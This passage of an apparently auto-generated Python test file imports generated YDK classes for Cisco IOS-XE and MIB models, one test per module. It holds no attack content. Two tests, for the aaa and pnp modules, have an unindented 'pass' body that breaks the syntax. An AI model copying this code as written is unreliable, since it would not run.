    from ydk.models.cisco_ios_xe.CISCO_VLAN_MEMBERSHIP_MIB import CISCOVLANMEMBERSHIPMIB
def test_CISCO_VOICE_COMMON_DIAL_CONTROL_MIB(self):
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcSpeechCoderRate
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcFaxTransmitRate
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcCoderTypeRate
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcInBandSignaling
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcH320CallType
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CvcVideoCoderRate
    from ydk.models.cisco_ios_xe.CISCO_VOICE_COMMON_DIAL_CONTROL_MIB import CISCOVOICECOMMONDIALCONTROLMIB
def test_CISCO_VOICE_DIAL_CONTROL_MIB(self):
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallVolumeWMIntvlType
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallVolumeStatsIntvlType
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvSessionProtocol
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvAmrNbRtpEncap
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvIlbcFrameMode
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CvCallConnectionType
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DIAL_CONTROL_MIB import CISCOVOICEDIALCONTROLMIB
def test_CISCO_VOICE_DNIS_MIB(self):
    from ydk.models.cisco_ios_xe.CISCO_VOICE_DNIS_MIB import CISCOVOICEDNISMIB
def test_CISCO_VPDN_MGMT_MIB(self):
    from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import TunnelType
    from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import EndpointClass
    from ydk.models.cisco_ios_xe.CISCO_VPDN_MGMT_MIB import CISCOVPDNMGMTMIB
def test_CISCO_VTP_MIB(self):
    from ydk.models.cisco_ios_xe.CISCO_VTP_MIB import VlanType
    from ydk.models.cisco_ios_xe.CISCO_VTP_MIB import CISCOVTPMIB
def test_CLAB_DEF_MIB(self):
    from ydk.models.cisco_ios_xe.CLAB_DEF_MIB import CLABDEFMIB
def test_CLAB_TOPO_MIB(self):
    from ydk.models.cisco_ios_xe.CLAB_TOPO_MIB import CLABTOPOMIB
def test_Cisco_IOS_XE_aaa(self):
pass
# NOTE(review): auto-generated import smoke tests (Cisco-IOS-XE operational and
# config models). Tests whose body is `pass` presumably correspond to modules
# for which the generator produced no importable names — TODO confirm against
# the bundle generator output.
def test_Cisco_IOS_XE_aaa_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_aaa_oper import AaaSessProtType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_aaa_oper import AaaData
def test_Cisco_IOS_XE_acl(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_acl import AclPortType
def test_Cisco_IOS_XE_acl_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_acl_oper import AccessLists
def test_Cisco_IOS_XE_arp(self):
    pass
def test_Cisco_IOS_XE_arp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_arp_oper import IosArpMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_arp_oper import ArpData
def test_Cisco_IOS_XE_atm(self):
    pass
def test_Cisco_IOS_XE_avb(self):
    pass
def test_Cisco_IOS_XE_bba_group(self):
    pass
def test_Cisco_IOS_XE_bfd(self):
    pass
def test_Cisco_IOS_XE_bfd_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdOperSessionType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdRemoteStateType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdStateType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdLspType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bfd_oper import BfdState
def test_Cisco_IOS_XE_bgp(self):
    pass
def test_Cisco_IOS_XE_bgp_common_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_common_oper import AfiSafi
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_common_oper import TcpFsmState
def test_Cisco_IOS_XE_bgp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpLink
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpFsmState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_oper import BgpStateData
def test_Cisco_IOS_XE_bgp_route_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpOriginCode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpRpkiStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpRouteFilters
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bgp_route_oper import BgpNeighborRouteFilters
def test_Cisco_IOS_XE_boot_integrity_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_boot_integrity_oper import BootIntegrityOperData
def test_Cisco_IOS_XE_breakout_port_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_breakout_port_oper import BcChannelSpeed
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_breakout_port_oper import BreakoutPortOperData
def test_Cisco_IOS_XE_bridge_domain(self):
    pass
def test_Cisco_IOS_XE_bridge_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import IntfStatusType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import BridgeMacType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_bridge_oper import BridgeInstances
def test_Cisco_IOS_XE_call_home(self):
    pass
def test_Cisco_IOS_XE_card(self):
    pass
def test_Cisco_IOS_XE_cdp(self):
    pass
def test_Cisco_IOS_XE_cdp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpDuplex
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpAdvVersion
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpUnidirectionalMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpYesNo
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpEnableDisable
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cdp_oper import CdpNeighborDetails
def test_Cisco_IOS_XE_cef(self):
    pass
def test_Cisco_IOS_XE_cellular(self):
    pass
def test_Cisco_IOS_XE_cellwan_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwRadioPowerStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RadioBandwidth
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemTechnology
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RatPreference
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RatTechnology
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ServiceStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ModemService
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import LteCa
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import RegState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import PacketSessStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import ProfileScope
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanChv1SimStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanSimStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanSimUserOp
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsFeatureState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsPortSelected
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CwanGpsModeSelected
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cellwan_oper import CellwanOperData
def test_Cisco_IOS_XE_cfm_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cfm_oper import CfmLastClearedType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_cfm_oper import CfmStatistics
def test_Cisco_IOS_XE_checkpoint_archive_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_checkpoint_archive_oper import CheckpointArchives
def test_Cisco_IOS_XE_coap(self):
    pass
# NOTE(review): auto-generated import smoke tests — each test imports the names
# generated for one Cisco-IOS-XE model module; `pass` bodies have nothing to
# import for that module.
def test_Cisco_IOS_XE_common_types(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_common_types import AddrType
def test_Cisco_IOS_XE_controller(self):
    pass
def test_Cisco_IOS_XE_controller_vdsl_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import IdbStates
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import ModeTc
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_controller_vdsl_oper import VdslOperData
def test_Cisco_IOS_XE_crypto(self):
    pass
def test_Cisco_IOS_XE_cts(self):
    pass
def test_Cisco_IOS_XE_device_hardware_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import HwType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import AlarmSeverity
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_device_hardware_oper import DeviceHardwareData
def test_Cisco_IOS_XE_device_sensor(self):
    pass
def test_Cisco_IOS_XE_device_tracking(self):
    pass
def test_Cisco_IOS_XE_dhcp(self):
    pass
def test_Cisco_IOS_XE_dhcp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpServerBindingState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpServerBindingType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpClientState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpExpiryOption
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpClientIdType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_dhcp_oper import DhcpOperData
def test_Cisco_IOS_XE_diagnostics(self):
    pass
def test_Cisco_IOS_XE_diffserv_target_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Direction
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Inbound
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import Outbound
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_diffserv_target_oper import DiffservInterfacesState
def test_Cisco_IOS_XE_dot1x(self):
    pass
def test_Cisco_IOS_XE_eem(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_eem import OperatorType
def test_Cisco_IOS_XE_efp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_efp_oper import EfpStats
def test_Cisco_IOS_XE_eigrp(self):
    pass
def test_Cisco_IOS_XE_environment_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_environment_oper import SensorUnitsType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_environment_oper import EnvironmentSensors
def test_Cisco_IOS_XE_eta(self):
    pass
def test_Cisco_IOS_XE_ethernet(self):
    pass
def test_Cisco_IOS_XE_event_history_types(self):
    pass
def test_Cisco_IOS_XE_ezpm(self):
    pass
def test_Cisco_IOS_XE_features(self):
    pass
def test_Cisco_IOS_XE_fib_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibAddressFamily
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import EncapsulationHeaderType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibPathType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fib_oper import FibOperData
def test_Cisco_IOS_XE_flow(self):
    pass
def test_Cisco_IOS_XE_flow_monitor_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowExporterIpwriteStatsType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitorCacheType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitorCacheState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_flow_monitor_oper import FlowMonitors
def test_Cisco_IOS_XE_fw_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_fw_oper import FwOperData
def test_Cisco_IOS_XE_http(self):
    pass
def test_Cisco_IOS_XE_icmp(self):
    pass
def test_Cisco_IOS_XE_igmp(self):
    pass
def test_Cisco_IOS_XE_interface_common(self):
    pass
def test_Cisco_IOS_XE_interfaces(self):
    pass
def test_Cisco_IOS_XE_interfaces_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import QosMatchType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import ThreshUnit
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import QosDirection
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import AggregationType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import IntfState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import EtherDuplex
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import EtherSpeed
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import OperState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import IetfIntfType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import SerialCrc
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import SubrateSpeed
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import T1e1LoopbackMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_interfaces_oper import Interfaces
def test_Cisco_IOS_XE_ios_common_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosSnpaType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosEncapsType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ios_common_oper import IosLinktype
def test_Cisco_IOS_XE_ip(self):
    pass
def test_Cisco_IOS_XE_ip_sla_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import SlaOperType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import SlaReturnCode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import AccuracyType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import RttType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import TtlType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ip_sla_oper import IpSlaStats
def test_Cisco_IOS_XE_ipv6(self):
    pass
def test_Cisco_IOS_XE_ipv6_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ipv6_oper import Ipv6NdTdlState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ipv6_oper import Ipv6Data
def test_Cisco_IOS_XE_isis(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_isis import IsisLevelType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_isis import IsisRoutesLevelType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_isis import AuthenticationLevelType
def test_Cisco_IOS_XE_iwanfabric(self):
    pass
def test_Cisco_IOS_XE_l2vpn(self):
    pass
def test_Cisco_IOS_XE_l3vpn(self):
    pass
def test_Cisco_IOS_XE_license(self):
    pass
def test_Cisco_IOS_XE_line(self):
    pass
# NOTE(review): auto-generated import smoke tests — verify that the generated
# bindings for each Cisco-IOS-XE model module are importable.
def test_Cisco_IOS_XE_linecard_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_linecard_oper import LinecardOperData
def test_Cisco_IOS_XE_lisp(self):
    pass
def test_Cisco_IOS_XE_lisp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispAddressFamilyType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispIaftypeType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispMapReplyActionType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispRlocStateType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispSessionStateType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lisp_oper import LispState
def test_Cisco_IOS_XE_lldp(self):
    pass
def test_Cisco_IOS_XE_lldp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_lldp_oper import LldpEntries
def test_Cisco_IOS_XE_logging(self):
    pass
def test_Cisco_IOS_XE_mdt_cfg(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_cfg import MdtXfrmAttrType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_cfg import MdtXfrmOpType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_cfg import MdtXfrmLogicOp
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_cfg import MdtXfrmOperator
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_cfg import MdtConfigData
def test_Cisco_IOS_XE_mdt_common_defs(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_common_defs import MdtSubFilterType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_common_defs import MdtSubUpdateTrigger
def test_Cisco_IOS_XE_mdt_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_oper import MdtSubType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_oper import MdtSubState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_oper import MdtReceiverState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_oper import MdtConState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mdt_oper import MdtOperData
def test_Cisco_IOS_XE_memory_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_memory_oper import MemoryStatistics
def test_Cisco_IOS_XE_mka(self):
    pass
def test_Cisco_IOS_XE_mld(self):
    pass
def test_Cisco_IOS_XE_mmode(self):
    pass
def test_Cisco_IOS_XE_mpls(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls import LdpDiscoveryAddressType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls import MplsTeTiebreakerType
def test_Cisco_IOS_XE_mpls_forwarding_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import OutgoingInterfaceType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import OutgoingInterfaceDescriptionType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import OutgoingLabelType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import ConnectionInfoType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import ForwardingNextHopType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_mpls_forwarding_oper import MplsForwardingOperData
def test_Cisco_IOS_XE_multicast(self):
    pass
def test_Cisco_IOS_XE_mvrp(self):
    pass
def test_Cisco_IOS_XE_nam(self):
    pass
def test_Cisco_IOS_XE_nat(self):
    pass
def test_Cisco_IOS_XE_nat_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_nat_oper import NatData
def test_Cisco_IOS_XE_native(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_native import MonitorEventType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_native import LoggingLevelType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_native import Native
def test_Cisco_IOS_XE_nbar(self):
    pass
def test_Cisco_IOS_XE_nd(self):
    pass
def test_Cisco_IOS_XE_nhrp(self):
    pass
def test_Cisco_IOS_XE_ntp(self):
    pass
def test_Cisco_IOS_XE_ntp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import RefClockSourceType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import KissCodeType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import RefidPktTypeInfo
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import PeerSelectStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import PeerAuthStatus
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import PeerStatusWord
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import PeerEvent
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import ServerType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ntp_oper import NtpOperData
def test_Cisco_IOS_XE_object_group(self):
    pass
def test_Cisco_IOS_XE_ospf(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf import RedistOspfExternalType
def test_Cisco_IOS_XE_ospf_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import AddressFamily
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import OspfOperationMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import OspfNetworkType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import OspfAuthType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import NbrStateType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import Ospfv2LsaType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import OspfExternalMetricType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import Ospfv2IntfState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import Ospfv2AuthTypeSelection
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import Ospfv2CryptoAlgorithm
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper import OspfOperData
def test_Cisco_IOS_XE_ospfv3(self):
    pass
def test_Cisco_IOS_XE_otv(self):
    pass
def test_Cisco_IOS_XE_parser(self):
    pass
def test_Cisco_IOS_XE_pathmgr(self):
    pass
def test_Cisco_IOS_XE_pfr(self):
    pass
def test_Cisco_IOS_XE_platform(self):
    pass
def test_Cisco_IOS_XE_platform_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_platform_oper import PlatformCompType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_platform_oper import PlatformPropValueType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_platform_oper import Components
def test_Cisco_IOS_XE_platform_software_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_platform_software_oper import BFru
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_platform_software_oper import CiscoPlatformSoftware
def test_Cisco_IOS_XE_pnp(self):
pass
# NOTE(review): auto-generated import smoke tests — verify that the generated
# bindings for each Cisco-IOS-XE model module are importable.
def test_Cisco_IOS_XE_poe_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_poe_oper import IlpowerPdClass
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_poe_oper import PoeOperData
def test_Cisco_IOS_XE_policy(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import PrecedenceType2
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import PolicyActionType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import ClassNameType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import PolicePacketsBytesType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import BytesMsUsType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_policy import PolicePpsBpsType
def test_Cisco_IOS_XE_power(self):
    pass
def test_Cisco_IOS_XE_ppp(self):
    pass
def test_Cisco_IOS_XE_ppp_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ppp_oper import PppIosAuthType
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ppp_oper import PppoeOperationalRole
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_ppp_oper import PppData
def test_Cisco_IOS_XE_process_cpu_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_process_cpu_oper import CpuUsage
def test_Cisco_IOS_XE_process_memory_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_process_memory_oper import MemoryUsageProcesses
def test_Cisco_IOS_XE_ptp(self):
    pass
def test_Cisco_IOS_XE_qos(self):
    pass
def test_Cisco_IOS_XE_rip(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rip import OffsetListInOutType
def test_Cisco_IOS_XE_route_map(self):
    pass
def test_Cisco_IOS_XE_rpc(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Switch
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Default
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Clear
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Release
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Reload
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Cellular
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import License
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Service
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import VirtualService
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Copy
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Delete
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import AppHosting
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Guestshell
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Start
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Stop
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_rpc import Utd
def test_Cisco_IOS_XE_rsvp(self):
    pass
def test_Cisco_IOS_XE_sanet(self):
    pass
def test_Cisco_IOS_XE_segment_routing(self):
    pass
def test_Cisco_IOS_XE_service_chain(self):
    pass
def test_Cisco_IOS_XE_service_discovery(self):
    pass
def test_Cisco_IOS_XE_service_insertion(self):
    pass
def test_Cisco_IOS_XE_service_routing(self):
    pass
def test_Cisco_IOS_XE_sla(self):
    pass
def test_Cisco_IOS_XE_snmp(self):
    pass
def test_Cisco_IOS_XE_spanning_tree(self):
    pass
def test_Cisco_IOS_XE_spanning_tree_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpPortState
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpPortRole
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpLinkRole
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpPortGuard
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpPortBpduguard
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpPortBpdufilter
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpMode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_spanning_tree_oper import StpDetails
def test_Cisco_IOS_XE_stackwise_virtual(self):
    pass
def test_Cisco_IOS_XE_switch(self):
    pass
def test_Cisco_IOS_XE_tcam_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_tcam_oper import TcamDetails
def test_Cisco_IOS_XE_template(self):
    pass
def test_Cisco_IOS_XE_track(self):
    pass
def test_Cisco_IOS_XE_transceiver_oper(self):
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_transceiver_oper import XcvrSonetCode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_transceiver_oper import XcvrOtnCode
    from ydk.models.cisco_ios_xe.Cisco_IOS_XE_transceiver_oper import TransceiverOperData
